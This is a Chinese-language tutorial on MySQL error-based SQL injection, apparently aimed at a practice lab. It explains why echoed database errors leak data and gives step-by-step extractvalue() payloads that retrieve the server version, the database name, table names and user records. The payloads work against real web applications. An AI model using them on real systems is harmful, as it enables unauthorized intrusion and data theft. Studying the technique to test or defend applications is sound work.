1818IP-服务器技术教程,云服务器评测推荐,服务器系统排错处理,环境搭建,攻击防护等

当前位置:首页 - 数据库 - MySQL - 正文

君子好学,自强不息!

mysql报错注入是什么

一、什么是报错注入?以及什么情况下使用?

  报错注入也可以说 是一种盲注------构造 payload 让信息通过错误提示回显出。在使用联合查询无法爆出显位时可考虑使用报错注入。

那么报错注入是怎么形成的呢?

首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名;

其次,必不可少就是后台未对MySQL相应的报错函数进行过滤

二、报错注入常用的函数

  在这里我使用的是extractvalue()函数,其作用是从目标XML中返回包含所查询值的字符串

  EXTRACTVALUE (XML_document, XPath_string):第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串)

三、基本流程

1.获取版本信息

使用语句 

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+ 。 其中concat是拼接()内的参数,0x7e解码之后为~符号。--+为注释符,将源代码中之后的语句全部注释掉以免发生错误。测试之后结果如下:
     //concat前的1为extractvalue()函数的第一个参数,可换为任意数字
     //语句中的第二个0x7e可以省略

2.获取数据库名称

使用语句

1‘ and extractvalue(1,concat(0x7e,(select database()),0x7e))--+,

3.获取表名

1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+. 其中group_concat将tale_name字段的所有行放在一行上显示出来,如下所示

4.获取数据

1' and extractvalue(1,concat(0x7e,(select * from (select username from users limit 0,1) as a),0x7e))--+. 修改其中的limit参数即可获取users表中的不同行内容


本文来源:1818IP

本文地址:https://www.1818ip.com/post/2968.html

免责声明:本文由用户上传,如有侵权请联系删除!

发表评论

必填

选填

选填

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。